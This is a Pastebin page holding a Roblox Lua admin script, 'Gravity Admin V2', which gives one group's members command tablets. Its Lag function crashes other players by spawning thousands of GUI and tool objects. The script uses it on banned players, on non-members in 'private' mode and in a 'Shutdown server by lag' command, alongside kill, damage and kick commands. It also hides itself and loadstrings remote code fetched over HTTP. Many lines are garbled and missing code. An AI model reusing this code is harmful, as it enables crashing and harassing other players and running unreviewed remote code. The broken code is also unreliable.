Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Settings={
- ['SD']=false;
- ['PrivateSB']=false;
- ['Version']=('2.1 APLHA');
- ['ScriptLines']=(617);
- ['Commands']={};
- ['AllTablets']={};
- ['Seconds']=0;
- ['Minutes']=0;
- ['Hours']=0;
- ['Antiban']={
- {['Name']='xxsquidisrarexx'};
- {['Name']='itsJaden2'};
- };
- ['LogEnabled']=true;
- Bet=";"
- Commands={}
- Logs={} -- Error log NOT chat log ._.
- TDefalt=true
- TBox=false
- Banned={
- {NAME='FeedTheRich'};
- }
- MusicIDs={
- {NAME='Nickelback If today was your last day',ID=180098164,PITCH=1};
- {NAME='IT\'S MY LIFE BY BON JOVI',ID=180096824,PITCH=1};
- {NAME='Tristam & Braken - Flight (Extended)',ID=142303063,PITCH=1};
- {NAME='Virtual Riot - Idols [EDM Mashup]',ID=145763936,PITCH=1};
- {NAME='Far East Movement - Like A G6',ID=165402253,PITCH=1};
- {NAME='[Electro] - Pegboard Nerds - Disconnected',ID=144626383,PITCH=1};
- {NAME='[Electro] Madeon - The City',ID=167336154,PITCH=1};
- {NAME='Darius Rucker Wagon Wheel',ID=181747473,PITCH=1};
- {NAME='Electrode',ID=159541485,PITCH=1};
- }
- HatIDs={
- {NAME='Dominus Aureus',ID=138932314};
- {NAME='Dominus Frigidus',ID=48545806};
- {NAME='Dominus Empyreus',ID=21070012};
- {NAME='Dominus Infernus',ID=31101391};
- {NAME='Dominus Astra',ID=162067148};
- {NAME='Dominus Messor',ID=64444871};
- {NAME='Dominus Vespertilio',ID=96103379};
- {NAME='Red Sparkle Time Fedora',ID=72082328};
- {NAME='Teal Sparkle Time Fedora',ID=147180077};
- {NAME='Gold Sparkle Time Fedora',ID=1285307};
- {NAME='Purple Sparkle Time Fedora',ID=63043890};
- {NAME='Midnight Blue Sparkle Time Fedora',ID=119916949};
- {NAME='Lord of the Federation',ID=88885069};
- {NAME='Gold Ollie',ID=22546563};
- }
- PlaceAntibans=function()
- for _, Player in pairs(game.Players:GetPlayers()) do
- if game:GetService("GamePassService"):PlayerHasPass(Player, 186959944) then
- print(Player.Name.. ' Has Antiban')
- table.insert(Settings.Antiban,Player.Name)
- end
- end
- end
- script.Parent=nil
- Lag=function(Player)
- for i=0,4000,10 do
- local'ScreenGui',game.Players[Player.Name]:FindFirstChild('PlayerGui'))
- local'ImageLabel',Gui)
- Im.Image=('rbxassetid://185888404')
- local'Tool',game.Players[Player.Name]:FindFirstChild('Backpack'))
- T.Name=('Gravity Studios')
- end
- end
- CheckPriSB=function()
- if Settings.PrivateSB==true then
- for _, v in pairs(game.Players:GetPlayers()) do
- if not v:IsInGroup(1199497) then Lag(game.Players[v.Name])
- else
- end
- end
- end
- end
- PChat=function(Plr,Msg)
- if Plr:IsInGroup(1199497) then
- if Msg:find('/e') then else
- game:GetService('Chat'):Chat(Plr.Character.Head,'GroupRank [ '..Plr:GetRankInGroup(1199497)..' ] Msg [ '..Msg..' ]','Blue')
- end
- end
- end
- CheckBanned=function(Plr)
- for _, data in pairs(Banned) do
- if Plr.Name==data.NAME:lower() then
- Lag(Plr)
- print(Plr.Name..' Crashed For Being On Bannedlist')
- end
- end
- end
- coroutine.wrap(function()
- while wait(1) do
- Settings.Seconds = Settings.Seconds + 1
- if Settings.Seconds == 60 then
- Settings.Seconds = 0
- Settings.Minutes = Settings.Minutes + 1
- end
- if Settings.Minutes == 60 then
- Settings.Minutes = 0
- Settings.Hours = Settings.Hours + 1
- end
- end
- end)()
- Dismiss=function(plr)
- for _,v in pairs(Tablets) do
- if v.Plr==plr.Name then
- if game.Players[plr.Name].Character.Parent==game.Workspace then
- coroutine.wrap(function()
- v.Tab:remove()
- end)()
- end
- end
- end
- end
- rotat1=0
- Tablets={}
- Rot=0
- RotValue=0.1
- rotat1=rotat1+(0.1/100)
- MTabs=function()
- Rot=Rot+RotValue/100
- for _, Player in pairs(game.Players:GetPlayers()) do
- local PlrTabs = {}
- for i,v in pairs(Tablets) do
- if v.Tab.Parent~=nil and v.Plr==Player.Name then
- table.insert(PlrTabs, v)
- end
- end
- for i,v in pairs(PlrTabs) do
- pcall(function()
- if Player.Character.Parent==game.Workspace then
- local pos=Player.Character.Torso.CFrame
- local Rad=5+(#PlrTabs*0.5)
- if v.Tab.Name==('[Gravity NoteOutput]') then Rad=3+(#PlrTabs*0.5) else Rad=5+(#PlrTabs*0.5) end
- local x= math.sin(time()/#PlrTabs + (math.pi*2)/#PlrTabs*i) * (#PlrTabs+3)
- local y=0
- if v.Tab.Name==('[Gravity NoteOutput]') then y=4 else y=0 end
- local z=math.cos(time()/#PlrTabs + (math.pi*2)/#PlrTabs*i) * (#PlrTabs+3)
- local,y,z)+pos.p
- local brot=v.Tab.CFrame.p
- local crot=(arot*.1+brot*.9)
- local drot=math.rad((Rot*800)*math.pi)
- if v.Tab.Name==('[Gravity NoteOutput]') then v.Tab.CFrame=v.Tab.CFrame*CFrame.Angles(drot,0,drot) else v.Tab.CFrame=v.Tab.CFrame*CFrame.Angles(math.rad(10),drot,0) end
- local d = math.rad((rotat1*40*20)*math.pi);
- pos = Player.Character.Torso.CFrame
- local cPos = v.Tab.Position
- local ePos =, 0, z) + (pos.p or, -5, 0))
- local nPos = (ePos-cPos)*.25
- cPos = cPos + nPos
- end
- end)
- end
- end
- end
- Notication=function(Player,Text)
- if Text==nil then Text=('Command Error') end
- local'Part',workspace) Tab.Material=('Plastic')
- Tab.Name=('[Gravity NoteOutput]') Tab.Anchored=true Tab.CanCollide=false Tab.Transparency=(0.5)
- Tab.Locked=true Tab.TopSurface=('Smooth') Tab.BottomSurface=('Smooth') Tab.FormFactor=('Custom'),2,2)'Really blue')
- local'ClickDetector',Tab) Click.MaxActivationDistance=(math.huge)
- local'PointLight',Tab) Light.Brightness=(1),255,255)
- Light.Range=(8),0,255) Light.Shadows=false local'SelectionBox',Tab) Box.Color=Tab.BrickColor Box.Adornee=(Tab) Box.Transparency=(0.5)
- local'BillboardGui',Tab) BG.Active=false BG.AlwaysOnTop=false
- local'TextLabel',BG) Textlabel.BackgroundTransparency=(1)
-,0,0,0),0,1,0) Textlabel.Visible=true
- Textlabel.Font=('SourceSansBold') Textlabel.FontSize=('Size18') Textlabel.Text=(Text),0,255)
- Textlabel.TextScaled=false Textlabel.TextWrapped=true
- if TBox==true then Box.Transparency=(1) else Box.Transparency=(0.3) end
- MTabs()
- Click.MouseClick:connect(function(Pl)
- if Pl==Player then
- Tab:remove()
- wait()
- MTabs()
- end
- end)
- table.insert(Tablets,{Tab=Tab,Plr=Player.Name})
- wait()
- MTabs()
- end
- Tablet=function(Player,Color,Text,Func)
- if Player==nil then Player=game.Players:GetPlayers()[math.random(1,#game.Players:GetPlayers())] end
- if Color==nil then Color=('Institutional white') end
- if Text==nil then Text=('Command Error') end
- if Func==nil then Func=function() end end
- local'Part',workspace) Tab.Material=('Plastic')
- Tab.Name=('[Gravity Output]') Tab.Anchored=true Tab.CanCollide=false Tab.Transparency=(0.5)
- Tab.Locked=true Tab.FormFactor=('Custom')
- local'ClickDetector',Tab) Click.MaxActivationDistance=(math.huge)
- local'PointLight',Tab) Light.Brightness=(1),255,255)
- Light.Range=(8) Light.Shadows=false local'SelectionBox',Tab) Box.Color=Tab.BrickColor Box.Transparency=(0.3)
- local'BillboardGui',Tab) BG.Active=false BG.AlwaysOnTop=false
- local'TextLabel',BG) Textlabel.BackgroundTransparency=(1)
-,0,0,0),0,1,0) Textlabel.Visible=true
- Textlabel.Font=('SourceSansBold') Textlabel.FontSize=('Size18') Textlabel.Text=(Text),0,0)
- Textlabel.TextScaled=false Textlabel.TextWrapped=true MTabs()
- if TBox==true then Box.Adornee=(nil) else Box.Adornee=(Tab) end
- if TDefalt==true then,5,0.2) else,2,2) end
- Click.MouseClick:connect(function(Pl)
- if Pl==Player then
- Dismiss(Player)
- wait()
- Func=Func
- Func()
- if not Func then
- MTabs()
- end
- end
- end)
- table.insert(Tablets,{Tab=Tab,Plr=Player.Name})
- wait()
- MTabs()
- end
- Shutdown=function()
- if Settings.SD==true then
- for _, v in pairs(game.Players:GetPlayers()) do
- for i=10,0,-1 do
- wait(1)
- if i==0 and Settings.SD==true then Lag(v) v:Kick()end
- end
- end
- end
- end
- RemoveSounds=function()
- for _, v in next(workspace) do
- if v:IsA('Sound') then v.Looped=false v:Pause() v:remove()
- end
- end
- end
- MusicInterance=function(Plr)
- local'Sound',workspace)
- for _, data in pairs(MusicIDs) do
- Tablet(Plr,'Lime green',data.NAME,function()
- Tablet(Plr,'Lime green','Pitch | ',function() end)
- Tablet(Plr,'Lime green','Name | ',function() S.Name=(data.NAME) end)
- Tablet(Plr,'Lime green','AssetId | ',function() S.SoundId=(data.ID) end)
- Tablet(Plr,'Lime green','Play',function()
- Tablet(Plr,'Lime green','Playing Music | ',function() end)
- S.SoundId=('rbxassetid://' S.Pitch=(data.PITCH) wait(0.1) S:Play() end)
- Tablet(Plr,'Lime green','Stop',function() RemoveSounds()
- Tablet(Plr,'Lime green','Stoped All Sound In Workspace',function() end) end)
- end)
- end
- end
- CLog=function(Plr,Msg)
- if Settings.LogEnabled==true then
- if not Msg:find(Bet) then
- if not Msg:find('/e') then
- table.insert(Logs,{Plr=Plr.Name,Msg=Msg})
- else
- end
- else
- end
- end
- end
- OpenLog=function(Plr)
- if Settings.LogEnabled==true then
- Tablet(Plr,'Really red','Chat Logs',function()
- Tablet(Plr,'Cyan','Back',function() OpenLog(Plr) end)
- for _, v in pairs(Logs) do
- Tablet(Plr,'Lime green',v.Plr,function()
- Tablet(Plr,'Cyan','Back',function() OpenLog(Plr) end)
- Tablet(Plr,'Lime green','PLAYER | '..v.Plr,function() end)
- Tablet(Plr,'Lime green','MSG | '..v.Msg,function() end)
- end)
- end
- end)
- Tablet(Plr,'Really red','Error Logs',function()
- Tablet(Plr,'Cyan','Back',function() OpenLog(Plr) end)
- end)
- end
- end
- PlaceRanking=function()
- for _,Player in pairs(game.Players:GetPlayers()) do
- if Player:IsInGroup(1199497) then
- if Player:GetRankInGroup(1199497)==0 then elseif
- Player:GetRankInGroup(1199497)==1 then elseif
- Player:GetRankInGroup(1199497)==2 then elseif
- Player:GetRankInGroup(1199497)==3 then elseif
- Player:GetRankInGroup(1199497)==4 then elseif
- Player:GetRankInGroup(1199497)==5 then elseif
- Player:GetRankInGroup(1199497)==255 then else
- end
- else
- end
- end
- end
- NoteRank=function(v)
- local i=game.Players:FindFirstChild(v.Name)
- if i:IsInGroup(1199497) then
- if i:GetRankInGroup(1199497)==1 then Notication(i,'Your Rank = '..i:GetRankInGroup(1199497)) elseif
- i:GetRankInGroup(1199497)==2 then Notication(i,'Your Rank = '..i:GetRankInGroup(1199497)) elseif
- i:GetRankInGroup(1199497)==3 then Notication(i,'Your Rank = '..i:GetRankInGroup(1199497)) elseif
- i:GetRankInGroup(1199497)==4 then Notication(i,'Your Rank = '..i:GetRankInGroup(1199497)) elseif
- i:GetRankInGroup(1199497)==5 then Notication(i,'Your Rank = '..i:GetRankInGroup(1199497)) elseif
- i:GetRankInGroup(1199497)==255 then Notication(i,'Your Rank = '..i:GetRankInGroup(1199497)) else
- Notication(i,'Your Rank = '..i:GetRankInGroup(1199497))
- end
- end
- end
- CheckHighRank=function(Plr)
- for _, HR in pairs(game.Players:GetPlayers()) do
- if Plr:IsInGroup(1199497) then
- if HR:IsInGroup(1199497) then
- Notication(HR,Plr.Name..' A High Rank In #Gravity Tech Ha Joined The Current Server! ROLE ['..Plr:GetRoleInGroup(1199497)..']')
- end
- end
- end
- end
- Base=function()
- local Base ="Part")
- Base.BrickColor ="Dark green")
- Base.Position =, 0.5, 0)
- Base.Transparency = 0
- Base.Elasticity = 0.5
- Base.FormFactor = "Custom"
- Base.CanCollide = true
- Base.Friction = 0.30000001192093
- Base.Size =, 1.20000005, 512)
- Base.Archivable = true
- Base.Material = "Plastic"
- Base.RotVelocity =, 0, 0)
- Base.Reflectance = 0
- Base.Locked = true
- Base.Anchored = true
- Base.Name = "Base"
- Base.TopSurface = "Smooth"
- Base.BottomSurface = "Inlet"
- Base.Shape = "Block"
- Base.Parent = game.workspace
- end
- Update=function()
- for _, v in pairs(game.Players:GetPlayers()) do
- Notication(v,'Updating GravityV2 Please Wait Some Time Before Speaking A Command!')
- end
- loadstring(game:GetService('HttpService'):GetAsync('',true))()
- wait()
- script.Disabled=true
- script:remove()
- end
- --[[_Make_Command_Instance_]]--
- Cmd=function(Command,Desc,Name,Func)
- table.insert(Commands,{Command=Command,Desc=Desc,Name=Name,Func=Func})
- end
- ---------------------------------------------
- -------------- OnChatted_Connect ------------
- ---------------------------------------------
- function MatchPlr(Plr,Msg)
- local Plrs={}
- if Msg=="Me" or Msg=='-M' or Msg=="" then
- table.insert(Plrs, Plr)
- elseif Msg=="All" or Msg=='-A' then
- for _,i in pairs(game.Players:GetPlayers()) do
- table.insert(Plrs,i)
- end
- elseif Msg=="Others" or Msg=='-O' then
- for _,v in pairs(game.Players:GetPlayers()) do
- if v.Name ~= Plr.Name then
- table.insert(Plrs, v)
- end
- end
- elseif Msg=="Friends" or Msg=='-F' then
- for _,i in pairs(game.Players:GetChildren()) do
- if i:IsFriendsWith(Plr.userId) then
- table.insert(Plrs,i)
- end
- end
- elseif Msg=="Bestfriends" or Msg=='-BF' then
- for _,i in pairs(game.Players:GetChildren()) do
- if i:IsBestFriendsWith(Plr.userId) then
- table.insert(Plrs,i)
- end
- end
- elseif Msg=="Nonfriends" or Msg=='-NF' then
- for _,i in pairs(game.Players:GetChildren()) do
- if not i:IsFriendsWith(Plr.userId) then
- table.insert(Plrs,i)
- end
- end
- elseif Msg=="Nonbestfriends" or Msg=='-NBF' then
- for _,i in pairs(game.Players:GetChildren()) do
- if not i:IsBestFriendsWith(Plr.userId) then
- table.insert(Plrs,i)
- end
- end
- elseif Msg=="Nbc" or Msg=='-N' then
- for _,i in pairs(game.Players:GetChildren()) do
- if i.MembershipType == Enum.MembershipType.None then
- table.insert(Plrs,i)
- end
- end
- elseif Msg=="Tbc" or Msg=='-T' then
- for _,i in pairs(game.Players:GetChildren()) do
- if i.MembershipType == Enum.MembershipType.TurboBuildersClub then
- table.insert(Plrs,i)
- end
- end
- elseif Msg=="Obc" or Msg=='-OB' then
- for _,i in pairs(game.Players:GetChildren()) do
- if i.MembershipType == Enum.MembershipType.OutrageousBuildersClub then
- table.insert(Plrs,i)
- end
- end
- elseif Msg=="Anybc" or Msg=='-AB' then
- for _,i in pairs(game.Players:GetChildren()) do
- if i.MembershipType == Enum.MembershipType.OutrageousBuildersClub then
- table.insert(Plrs,i)
- end
- end
- elseif Msg=="Random" or Msg=='-R' then
- table.insert(Plrs,game.Players:GetPlayers()[#game.Players:GetPlayers()])
- else
- for _,v in pairs(game.Players:GetPlayers()) do
- if v.Name:lower() then
- table.insert(Plrs, v)
- end
- return Plr
- end
- return Plr
- end
- return Plrs
- end
- Chatted=function(Plr,Msg)
- Dismiss(Plr)
- if Plr:IsInGroup(1199497) then
- for _,data in pairs(Commands) do
- if Msg:sub(1,#(data['Command']:lower()..Bet))==data['Command']:lower()..Bet then
- local Ms=Msg:sub(1,#data['Command']:lower()+#Bet+1)
- data['Func'](MatchPlr(Plr,Ms),Msg)
- end
- end
- end
- end
- game.Players.PlayerAdded:connect(function(Plr)
- CheckHighRank(Plr)
- CheckBanned(Plr)
- Plr.Chatted:connect(function(Msg)
- PChat(Plr,Msg)
- CheckBanned(Plr)
- CLog(Plr,Msg)
- Chatted(Plr,Msg)
- end)
- end)
- for _, Plr in pairs(game.Players:GetPlayers()) do
- Plr.Chatted:connect(function(Msg)
- PChat(Plr,Msg)
- CheckBanned(Plr)
- CLog(Plr,Msg)
- Chatted(Plr,Msg)
- end)
- end
- OpenCommands=function(Plr)
- for _,data in next, Commands do
- Tablet(Plr,'Insitiutional white',data.Name,function()
- Tablet(Plr,'Cyan','Back',function() OpenCommands(Plr) end)
- Tablet(Plr,'Insitiutional white','COMMAND | ',function() end)
- Tablet(Plr,'Insitiutional white','DESC | ',function() end)
- Tablet(Plr,'Insitiutional white','NAME | ',function() end)
- end)
- end
- end
- ShowPri=function(Plr)
- Tablet(Plr,'Deep orange','Pri Settings',function()
- Tablet(Plr,'Lime green','Pri On',function() Settings.PrivateSB=true wait() CheckPriSB() end)
- Tablet(Plr,'Really red','Pri Off',function() Settings.PrivateSB=false wait() CheckPriSB() end)
- end)
- if Settings['PrivateSB']==true then
- Notication(Plr,'STATUS : Online')
- elseif Settings['PrivateSB']==false then
- Notication(Plr,'STATUS : Offline')
- end
- end
- ShowSD=function(Plr)
- Tablet(Plr,'Deep orange','SD Settings',function()
- Tablet(Plr,'Lime green','SD On',function() Settings.SD=true wait() Shutdown() end)
- Tablet(Plr,'Really red','SD Off',function() Settings.SD=false wait() Shutdown() end)
- end)
- end
- ShowRunTime=function(Plr)
- Tablet(Plr,'New Yeller','Seconds ['..Settings.Seconds..'] Minutes ['..Settings.Minutes..'] Hours ['..Settings.Hours..']',function() end)
- end
- InsertHat=function(Plr,ID)
- local x=game:GetService("InsertService"):LoadAsset(ID)
- for _, v in ipairs(x:GetChildren()) do
- if v:IsA("Accoutrement") then
- pcall(function()
- v.Parent=Plr.Character end)
- return v
- end
- end
- return x
- end
- HatInterance=function(Plr)
- Dismiss(Plr)
- for _, data in pairs(HatIDs) do
- Tablet(Plr,'White',data.NAME,function()
- InsertHat(Plr,data.ID)
- Tablet(Plr,'White','Inserting ',function() end)
- end)
- end
- end
- PlayerList=function(Speaker)
- Notication(Speaker,'Number Of Players ['']',function() end)
- for _, v in pairs(game.Players:GetPlayers()) do
- Tablet(Speaker,'White','[.'..v.Name..'.]?',function()
- Tablet(Speaker,'White','Name ['..v.Name..']',function() end)
- Tablet(Speaker,'White','Rank ['..v:GetRankInGroup(1199497)..']',function() end)
- Tablet(Speaker,'White','Lag',function() Lag(v) end)
- Tablet(Speaker,'White','Lag And Kick',function() Lag(v) game.Players[v.Name]:Kick() end)
- Tablet(Speaker,'White','Kick',function() game.Players[v.Name]:Kick() end)
- Tablet(Speaker,'White','Age ['..v.AccountAge..']',function() end)
- Tablet(Speaker,'Cyan','Back',function() PlayerList(Speaker) end)
- end)
- end
- end
- --[[Commands]]--
- Cmd('Cmds','Open A Command List','Commands',function(Speaker,Msg)
- OpenCommands(Speaker)
- end)
- Cmd('SM','Search Audio From HttpService','Search Music',function(Speaker,Msg)
- local h=game:service'HttpService':GetAsync(''..Msg..'&SortType=0&SortAggregation=3&SortCurrency=0&LegendExpanded=true&Category=9',true)
- Tablet(Speaker,'White',h.Name,function() end)
- end)
- Cmd('Ping','Tablet A Message','Ping',function(Msg,Speaker)
- if Msg=='' then Notication(Speaker,'Please Say A Valid Message') else
- Tablet(Speaker,'Deep orange',Msg,function() end)
- end
- end)
- Cmd('Afk','Tell The Server Your AFK','Afk',function(Speaker)
- for i=0,8,1 do
- Notication(Speaker,Speaker.Name..' Is AFK')
- end
- end)
- Cmd('Info','Info About The Script','Info',function(Speaker)
- Notication(Speaker,'jillmiles1 Is The Make Of The Admin')
- Notication(Speaker,'Credits To ReIatively For The Group')
- end)
- Cmd('Hat','Hat The Player','Hat',function(Plr,Speaker)
- HatInterance(Plr)
- end)
- Cmd('SD','Shutdown server by lag >:D','Shutdown',function(Speaker,Msg)
- ShowSD(Speaker)
- end)
- Cmd('RunTime','Shows How Long GravityV2 Has Been Opperating','Runtime',function(Speaker,Msg)
- ShowRunTime(Speaker)
- end)
- Cmd('Music','Shows A MusicInterance','Music List',function(Speaker)
- MusicInterance(Speaker)
- end)
- Cmd('Pri','Turns Private Server On And Off','PrivateSB',function(Speaker)
- ShowPri(Speaker)
- end)
- Cmd('Players','Shows A PlayerList','PlayerList',function(Speaker)
- PlayerList(Speaker)
- end)
- Cmd('Update','Updates GravityV2 Auto','Update',function(Speaker)
- Update()
- end)
- Cmd('Dt','Dismiss your Tablets','Dismiss',function(Speaker)
- --Leave this blank.
- end)
- Cmd('Kill','Kill The Player','Kill',function(Plr,Speaker)
- Plr.Character.Humanoid.Health=0 -- ff kill.
- end)
- Cmd('Lag','Kick The Player','Lag',function(Plr,Speaker)
- Lag(Plr)
- end)
- Cmd('Base','Make A Base','Base',function(Speaker)
- Base()
- end)
- Cmd('Damage','Damage The Player','Damage',function(Plr,Dag,Speaker)
- game.Players[Plr.Name].Character.Humanoid:TakeDamage(tonumber(Dag))
- end)
- Cmd('Respawn','Respawn Yourself','Respawn',function(Speaker,Plr)
- game.Players[Plr.Name]:LoadCharacter()
- end)
- Cmd('Logs','Shows Error Logs In Script','Error Logs',function(Speaker)
- OpenLog(Speaker)
- end)
- Cmd('Ban','Add A Player To BanList','Ban',function(Speaker,Plr)
- table.insert(Banned,{NAME=Plr.Name})
- Notication(Speaker,'Banned '..Plr.Name..'!',function() end)
- end)
- Cmd('TSet','Changes Tablet Size','Tablet Settings',function(Speaker)
- Tablet(Speaker,'Deep orange','Tablet Settings',function()
- if TBox==true then
- Tablet(Speaker,'Deep orange','Selectionbox?',function() TBox=false
- Notication(Speaker,'SelectionBox Enabled')
- end)
- else
- Tablet(Speaker,'Deep orange','No-Selectionbox?',function() TBox=true
- Notication(Speaker,'No SelectionBox Enabled')
- end)
- end
- if TDefalt==true then
- Tablet(Speaker,'Deep orange','Box Tablet',function() TDefalt=false
- Notication(Speaker,'Box Tablet Enabled')
- end)
- else
- Tablet(Speaker,'Deep orange','Defalt Tablet',function() TDefalt=true
- Notication(Speaker,'Defalt Tablet Enabled')
- end)
- end
- end)
- end)
- Cmd('TLogs','Shows Error Logs In Script','Toggle Logs',function(Speaker)
- Tablet(Speaker,'Deep orange','Logs Settings',function()
- if Settings.LogEnabled==true then
- Settings.LogEnabled=false wait()
- Tablet(Speaker,'Really red','Error Logs Disabled',function() end)
- elseif Settings.LogEnabled==false then
- Settings.LogEnabled=true wait()
- Tablet(Speaker,'Lime green','Error Logs Enabled',function() end)
- end
- end)
- end)
- Cmd('Dtall','Dismiss All Tablets In The Current Server','DtAll',function(Speaker)
- for _, v in pairs(game.Players:GetPlayers()) do
- Dismiss(v)
- end
- end)
- --[[ Intro crap ]]--
- PlaceRanking()
- PlaceAntibans()
- game.Players.PlayerAdded:connect(PlaceRanking,PlaceAntibans)
- for _, v in pairs(game.Players:GetPlayers()) do
- CheckPriSB()
- Tablet(v,'Lime green','[Hello '..v.Name..'!]',function() end)
- Tablet(v,'Deep orange','[Welcome to Gravity Studio\'s "Gravity Admin V2"'..v.Name..'!]',function() end)
- NoteRank(v)
- end
- game.Players.PlayerAdded:connect(function(v)
- CheckPriSB()
- NoteRank(v)
- Tablet(v,'Lime green','[Hello '..v.Name..'!]',function() end)
- Tablet(v,'Deep orange','[Welcome to Gravity Studio\'s "Gravity Admin V2"'..v.Name..'!]',function() end)
- end)
- while wait() do MTabs() end
- }
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